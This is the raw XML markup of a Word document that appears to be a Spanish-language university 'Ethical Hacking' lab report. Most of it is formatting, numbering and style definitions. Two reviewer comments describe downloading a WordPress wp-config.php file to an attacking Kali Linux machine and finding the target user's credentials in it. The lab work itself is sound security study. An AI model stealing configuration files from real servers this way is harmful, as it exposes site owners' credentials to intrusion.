      <w:proofErr w:type="spellEnd"/>
    </w:p>
  </w:comment>
  <w:comment w:id="26" w:author="DANIEL ORLANDO DIAZ LOPEZ" w:date="2019-08-24T06:37:00Z" w:initials="DODL">
    <w:p w14:paraId="3BB9F275" w14:textId="4D0D90B1" w:rsidR="00537CDB" w:rsidRDefault="00537CDB">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Aquí descargamos el archivo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wp-config.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en la maquina desde donde estamos haciendo el ataque, es decir la Kali Linux</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="27" w:author="DANIEL ORLANDO DIAZ LOPEZ" w:date="2019-08-24T06:38:00Z" w:initials="DODL">
    <w:p w14:paraId="202326AB" w14:textId="0D906966" w:rsidR="00537CDB" w:rsidRDefault="00537CDB">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">Y efectivamente dentro del archivo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wp-config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> encontramos las credenciales de ZICO!!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DFC3D8C" w15:done="0"/>
  <w15:commentEx w15:paraId="02375082" w15:done="0"/>
  <w15:commentEx w15:paraId="75DD6E4B" w15:done="0"/>
  <w15:commentEx w15:paraId="589436CE" w15:done="0"/>
  <w15:commentEx w15:paraId="60C70D56" w15:done="0"/>
  <w15:commentEx w15:paraId="5C3A71FF" w15:done="0"/>
  <w15:commentEx w15:paraId="10A8664F" w15:done="0"/>
  <w15:commentEx w15:paraId="29C0B00D" w15:done="0"/>
  <w15:commentEx w15:paraId="076BA659" w15:done="0"/>
  <w15:commentEx w15:paraId="1CFBE6B0" w15:done="0"/>
  <w15:commentEx w15:paraId="48920237" w15:done="0"/>
  <w15:commentEx w15:paraId="2FD231C0" w15:done="0"/>
  <w15:commentEx w15:paraId="1D079995" w15:done="0"/>
  <w15:commentEx w15:paraId="2BC1BE72" w15:done="0"/>
  <w15:commentEx w15:paraId="6DC5F015" w15:done="0"/>
  <w15:commentEx w15:paraId="263C2221" w15:done="0"/>
  <w15:commentEx w15:paraId="3993CF4A" w15:done="0"/>
  <w15:commentEx w15:paraId="75DCBE02" w15:done="0"/>
  <w15:commentEx w15:paraId="4D6CA2BB" w15:done="0"/>
  <w15:commentEx w15:paraId="1F585F70" w15:done="0"/>
  <w15:commentEx w15:paraId="2F0FC3C4" w15:done="0"/>
  <w15:commentEx w15:paraId="59B45E2D" w15:done="0"/>
  <w15:commentEx w15:paraId="3BB9F275" w15:done="0"/>
  <w15:commentEx w15:paraId="202326A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FC3D8C" w16cid:durableId="210B5117"/>
  <w16cid:commentId w16cid:paraId="02375082" w16cid:durableId="210B50F1"/>
  <w16cid:commentId w16cid:paraId="75DD6E4B" w16cid:durableId="210B5129"/>
  <w16cid:commentId w16cid:paraId="589436CE" w16cid:durableId="210B5145"/>
  <w16cid:commentId w16cid:paraId="60C70D56" w16cid:durableId="210B5207"/>
  <w16cid:commentId w16cid:paraId="5C3A71FF" w16cid:durableId="210B5201"/>
  <w16cid:commentId w16cid:paraId="10A8664F" w16cid:durableId="210B51F5"/>
  <w16cid:commentId w16cid:paraId="29C0B00D" w16cid:durableId="210B51B1"/>
  <w16cid:commentId w16cid:paraId="076BA659" w16cid:durableId="210B53BD"/>
  <w16cid:commentId w16cid:paraId="1CFBE6B0" w16cid:durableId="210B56C7"/>
  <w16cid:commentId w16cid:paraId="48920237" w16cid:durableId="210B5527"/>
  <w16cid:commentId w16cid:paraId="2FD231C0" w16cid:durableId="210B54FB"/>
  <w16cid:commentId w16cid:paraId="1D079995" w16cid:durableId="210B5484"/>
  <w16cid:commentId w16cid:paraId="2BC1BE72" w16cid:durableId="210B555C"/>
  <w16cid:commentId w16cid:paraId="6DC5F015" w16cid:durableId="210B5565"/>
  <w16cid:commentId w16cid:paraId="263C2221" w16cid:durableId="210B55AA"/>
  <w16cid:commentId w16cid:paraId="3993CF4A" w16cid:durableId="210B570B"/>
  <w16cid:commentId w16cid:paraId="75DCBE02" w16cid:durableId="210B57A4"/>
  <w16cid:commentId w16cid:paraId="4D6CA2BB" w16cid:durableId="210B57C1"/>
  <w16cid:commentId w16cid:paraId="1F585F70" w16cid:durableId="210B5857"/>
  <w16cid:commentId w16cid:paraId="2F0FC3C4" w16cid:durableId="210B5897"/>
  <w16cid:commentId w16cid:paraId="59B45E2D" w16cid:durableId="210B5971"/>
  <w16cid:commentId w16cid:paraId="3BB9F275" w16cid:durableId="210B599C"/>
  <w16cid:commentId w16cid:paraId="202326AB" w16cid:durableId="210B59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B2D35" w14:textId="77777777" w:rsidR="001671E5" w:rsidRDefault="001671E5" w:rsidP="00D9031B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4A21F896" w14:textId="77777777" w:rsidR="001671E5" w:rsidRDefault="001671E5" w:rsidP="00D90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06670" w14:textId="77777777" w:rsidR="001671E5" w:rsidRDefault="001671E5" w:rsidP="00D9031B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="10FA20EE" w14:textId="77777777" w:rsidR="001671E5" w:rsidRDefault="001671E5" w:rsidP="00D903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4459F" w14:textId="00845564" w:rsidR="00922B03" w:rsidRPr="001A667D" w:rsidRDefault="00922B03" w:rsidP="00E76231">
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:sz w:val="23"/>
        <w:szCs w:val="23"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="23"/>
        <w:szCs w:val="23"/>
      </w:rPr>
      <w:t xml:space="preserve">Laboratorio </w:t>
    </w:r>
    <w:proofErr w:type="spellStart"/>
    <w:r>
      <w:rPr>
        <w:sz w:val="23"/>
        <w:szCs w:val="23"/>
      </w:rPr>
      <w:t>Nº</w:t>
    </w:r>
    <w:proofErr w:type="spellEnd"/>
    <w:r>
      <w:rPr>
        <w:sz w:val="23"/>
        <w:szCs w:val="23"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r w:rsidR="00960C98">
      <w:rPr>
        <w:sz w:val="23"/>
        <w:szCs w:val="23"/>
      </w:rPr>
      <w:t>2</w:t>
    </w:r>
    <w:r w:rsidRPr="00E76231">
      <w:rPr>
        <w:sz w:val="23"/>
        <w:szCs w:val="23"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:proofErr w:type="gramStart"/>
    <w:r w:rsidRPr="00E76231">
      <w:rPr>
        <w:sz w:val="23"/>
        <w:szCs w:val="23"/>
      </w:rPr>
      <w:t xml:space="preserve">–  </w:t>
    </w:r>
    <w:proofErr w:type="spellStart"/>
    <w:r w:rsidR="00C736B4">
      <w:rPr>
        <w:sz w:val="23"/>
        <w:szCs w:val="23"/>
      </w:rPr>
      <w:t>Ethical</w:t>
    </w:r>
    <w:proofErr w:type="spellEnd"/>
    <w:proofErr w:type="gramEnd"/>
    <w:r w:rsidR="00C736B4">
      <w:rPr>
        <w:sz w:val="23"/>
        <w:szCs w:val="23"/>
      </w:rPr>
      <w:t xml:space="preserve"> Hac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E122E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="12BE5034"/>
    <w:lvl w:ilvl="0" w:tplc="8766D5FE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F7181"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="07A8291C"/>
    <w:lvl w:ilvl="0" w:tplc="1E0052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8144F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="93AEE7FA"/>
    <w:lvl w:ilvl="0" w:tplc="8766D5FE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1428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7FA16B0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="29249C8A"/>
    <w:lvl w:ilvl="0" w:tplc="75E094B4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="18B46DF6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7944B4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D16FC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F7EE2FD6"/>
    <w:lvl w:ilvl="0" w:tplc="0C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F9300E8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="895892D4"/>
    <w:lvl w:ilvl="0" w:tplc="930A7F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6A1ECD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A3BE1E5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3790ADE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A79EFAB2"/>
    <w:lvl w:ilvl="0" w:tplc="240A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7162E9F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6FA0D99E"/>
    <w:lvl w:ilvl="0" w:tplc="0409000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal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2765168D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AF9EE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830E65"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3B8E1D2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57674"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3B246856"/>
    <w:lvl w:ilvl="0" w:tplc="21D4040A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="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40" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="1760" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3200" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="3920" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4640" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5360" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6080" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2BCF6171"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AF9EE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D5321C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BD3EA54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381B02"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5AD631CA"/>
    <w:lvl w:ilvl="0" w:tplc="CE34390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A495A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7A62860A"/>
    <w:lvl w:ilvl="0" w:tplc="6B88C0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813E46"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="758AA1B4"/>
    <w:lvl w:ilvl="0" w:tplc="240A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8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="41E82627"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3A58B8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C16F3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="91E68E22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62DEC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="233C3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852C98"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F09C3538"/>
    <w:lvl w:ilvl="0" w:tplc="264A4A7E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  <w:color w:val="1F497D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73DCC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1488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0D4A04"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="66E25790"/>
    <w:lvl w:ilvl="0" w:tplc="264A4A7E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1854" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="1F497D"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="240A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8295388"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8EEC9DFC"/>
    <w:lvl w:ilvl="0" w:tplc="8766D5FE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F7373"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A1C69AE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B50B09"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C2C2417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DC7974"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="54C212C2"/>
    <w:lvl w:ilvl="0" w:tplc="FDD0E24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61D1B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="92287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21432"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="355EB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23117A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="550E4B70"/>
    <w:lvl w:ilvl="0" w:tplc="2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5FAC198A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="89C2720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0A0FD1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D2FA3A0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D17726"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="323CB97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828CC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9B5CAC9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F7D6C00"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="924E3442"/>
    <w:lvl w:ilvl="0" w:tplc="BC80F0D4"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451D18"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8FA40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26049"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="88163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3D5798"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="008421FE"/>
    <w:lvl w:ilvl="0" w:tplc="B1AA78B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64F0779"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DDD6EDFE"/>
    <w:lvl w:ilvl="0" w:tplc="4E1E2FDE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8A7BE6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D18206DE"/>
    <w:lvl w:ilvl="0" w:tplc="855ED0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8E5AE8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6A466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1"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="36">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="37">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="38">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="39">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="40">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="41">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="42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NIEL ORLANDO DIAZ LOPEZ">
    <w15:presenceInfo w15:providerId="AD" w15:userId="S::daniel.diaz@escuelaing.edu.co::744ba8a7-8c94-42b2-b172-4a4ef3844d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DY1NLIwNDI3MDZV0lEKTi0uzszPAykwqgUA6TTB1SwAAAA="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00851A32"/>
    <w:rsid w:val="00016EE5"/>
    <w:rsid w:val="0002266D"/>
    <w:rsid w:val="00024D1E"/>
    <w:rsid w:val="00072B15"/>
    <w:rsid w:val="00077BC3"/>
    <w:rsid w:val="00082A6A"/>
    <w:rsid w:val="000B4F99"/>
    <w:rsid w:val="000B7432"/>
    <w:rsid w:val="001046C6"/>
    <w:rsid w:val="001236F5"/>
    <w:rsid w:val="00147A58"/>
    <w:rsid w:val="001671E5"/>
    <w:rsid w:val="00170B76"/>
    <w:rsid w:val="00174B91"/>
    <w:rsid w:val="001821DE"/>
    <w:rsid w:val="001A04B5"/>
    <w:rsid w:val="001A667D"/>
    <w:rsid w:val="001D4DBD"/>
    <w:rsid w:val="002148DE"/>
    <w:rsid w:val="00227EB0"/>
    <w:rsid w:val="00240DB9"/>
    <w:rsid w:val="00266E13"/>
    <w:rsid w:val="00284C9E"/>
    <w:rsid w:val="002A5D55"/>
    <w:rsid w:val="002C5398"/>
    <w:rsid w:val="002D4299"/>
    <w:rsid w:val="00303928"/>
    <w:rsid w:val="0030613B"/>
    <w:rsid w:val="003176BE"/>
    <w:rsid w:val="0037097B"/>
    <w:rsid w:val="0038262D"/>
    <w:rsid w:val="00393FFB"/>
    <w:rsid w:val="003A6BC7"/>
    <w:rsid w:val="003D1FF5"/>
    <w:rsid w:val="003D3268"/>
    <w:rsid w:val="00465C42"/>
    <w:rsid w:val="004A38CA"/>
    <w:rsid w:val="004B04B5"/>
    <w:rsid w:val="004C0AD5"/>
    <w:rsid w:val="004D3D1B"/>
    <w:rsid w:val="004D48FD"/>
    <w:rsid w:val="004D6EBD"/>
    <w:rsid w:val="004E2B96"/>
    <w:rsid w:val="00513E11"/>
    <w:rsid w:val="00537CDB"/>
    <w:rsid w:val="00554641"/>
    <w:rsid w:val="005737D3"/>
    <w:rsid w:val="005953D9"/>
    <w:rsid w:val="005B7053"/>
    <w:rsid w:val="006060ED"/>
    <w:rsid w:val="00613E5E"/>
    <w:rsid w:val="006671EB"/>
    <w:rsid w:val="00674241"/>
    <w:rsid w:val="006845B7"/>
    <w:rsid w:val="006B1BA4"/>
    <w:rsid w:val="006B34C6"/>
    <w:rsid w:val="006E54EE"/>
    <w:rsid w:val="006F45EC"/>
    <w:rsid w:val="00770BF7"/>
    <w:rsid w:val="007A63CA"/>
    <w:rsid w:val="007C2023"/>
    <w:rsid w:val="007C6B11"/>
    <w:rsid w:val="007D27AD"/>
    <w:rsid w:val="007D3CE7"/>
    <w:rsid w:val="007F3F10"/>
    <w:rsid w:val="008140B8"/>
    <w:rsid w:val="00851A32"/>
    <w:rsid w:val="00853EC8"/>
    <w:rsid w:val="00861E79"/>
    <w:rsid w:val="00883D72"/>
    <w:rsid w:val="008936ED"/>
    <w:rsid w:val="0089786C"/>
    <w:rsid w:val="008B5A06"/>
    <w:rsid w:val="008E2380"/>
    <w:rsid w:val="008F692A"/>
    <w:rsid w:val="00922B03"/>
    <w:rsid w:val="00960C98"/>
    <w:rsid w:val="00973046"/>
    <w:rsid w:val="00975E5C"/>
    <w:rsid w:val="009879E3"/>
    <w:rsid w:val="009B7B24"/>
    <w:rsid w:val="009C523A"/>
    <w:rsid w:val="009D522E"/>
    <w:rsid w:val="009D79B4"/>
    <w:rsid w:val="009E6ACC"/>
    <w:rsid w:val="009F278B"/>
    <w:rsid w:val="00A331D0"/>
    <w:rsid w:val="00A360BB"/>
    <w:rsid w:val="00A53EC7"/>
    <w:rsid w:val="00A61D66"/>
    <w:rsid w:val="00A62269"/>
    <w:rsid w:val="00A802F0"/>
    <w:rsid w:val="00AB2591"/>
    <w:rsid w:val="00AC4198"/>
    <w:rsid w:val="00AD1C57"/>
    <w:rsid w:val="00AD460C"/>
    <w:rsid w:val="00AF29C2"/>
    <w:rsid w:val="00AF2D63"/>
    <w:rsid w:val="00B0243B"/>
    <w:rsid w:val="00B10352"/>
    <w:rsid w:val="00B10B79"/>
    <w:rsid w:val="00B179FB"/>
    <w:rsid w:val="00B47919"/>
    <w:rsid w:val="00B5276F"/>
    <w:rsid w:val="00B57643"/>
    <w:rsid w:val="00B61F04"/>
    <w:rsid w:val="00B676AC"/>
    <w:rsid w:val="00B76FAE"/>
    <w:rsid w:val="00B77446"/>
    <w:rsid w:val="00B8271E"/>
    <w:rsid w:val="00BA1891"/>
    <w:rsid w:val="00BA3DFD"/>
    <w:rsid w:val="00BB4BA3"/>
    <w:rsid w:val="00BB5383"/>
    <w:rsid w:val="00BD3AF1"/>
    <w:rsid w:val="00BE03D1"/>
    <w:rsid w:val="00C055FD"/>
    <w:rsid w:val="00C4725F"/>
    <w:rsid w:val="00C54766"/>
    <w:rsid w:val="00C64775"/>
    <w:rsid w:val="00C736B4"/>
    <w:rsid w:val="00C772A1"/>
    <w:rsid w:val="00C91165"/>
    <w:rsid w:val="00CB2A1A"/>
    <w:rsid w:val="00CC3CE4"/>
    <w:rsid w:val="00CE5DEE"/>
    <w:rsid w:val="00D05B0B"/>
    <w:rsid w:val="00D31721"/>
    <w:rsid w:val="00D56D00"/>
    <w:rsid w:val="00D662D0"/>
    <w:rsid w:val="00D9031B"/>
    <w:rsid w:val="00D92C54"/>
    <w:rsid w:val="00DA24DA"/>
    <w:rsid w:val="00DA6D41"/>
    <w:rsid w:val="00DC2B9B"/>
    <w:rsid w:val="00DC40FF"/>
    <w:rsid w:val="00DE0CE4"/>
    <w:rsid w:val="00DF0FEF"/>
    <w:rsid w:val="00DF5EFC"/>
    <w:rsid w:val="00DF76E4"/>
    <w:rsid w:val="00E004AE"/>
    <w:rsid w:val="00E07CB2"/>
    <w:rsid w:val="00E40019"/>
    <w:rsid w:val="00E67D2F"/>
    <w:rsid w:val="00E76231"/>
    <w:rsid w:val="00E83DA7"/>
    <w:rsid w:val="00E86584"/>
    <w:rsid w:val="00EA24A2"/>
    <w:rsid w:val="00EA4B03"/>
    <w:rsid w:val="00EB5B78"/>
    <w:rsid w:val="00EC0022"/>
    <w:rsid w:val="00EE3079"/>
    <w:rsid w:val="00F073E0"/>
    <w:rsid w:val="00F459BE"/>
    <w:rsid w:val="00F57440"/>
    <w:rsid w:val="00F94350"/>
    <w:rsid w:val="00FB2407"/>
    <w:rsid w:val="00FC4493"/>
    <w:rsid w:val="00FE0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C040B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{9A3C4909-05CE-4FE9-91B3-172BA83AE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BC7"/>
    <w:pPr>
      <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="es-CO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40B8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E0C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s-C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40B8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51A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51A3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17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03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31B"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D9031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31B"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AF2D63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DE0CE4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E0C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CO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1165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91165"/>
    <w:rPr>
      <w:lang w:val="es-CO"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FootnoteReference">
    <w:name w:val="footnote reference"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C91165"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="00123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4B04B5"/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B04B5"/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1">
    <w:name w:val="List Table 4 Accent 1"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="49"/>
    <w:rsid w:val="004B04B5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character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007D3CE7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8140B8"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:eastAsia="Times New Roman" w:hAnsi="Calibri Light" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="32"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="es-CO"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="008140B8"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:eastAsia="Times New Roman" w:hAnsi="Calibri Light" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
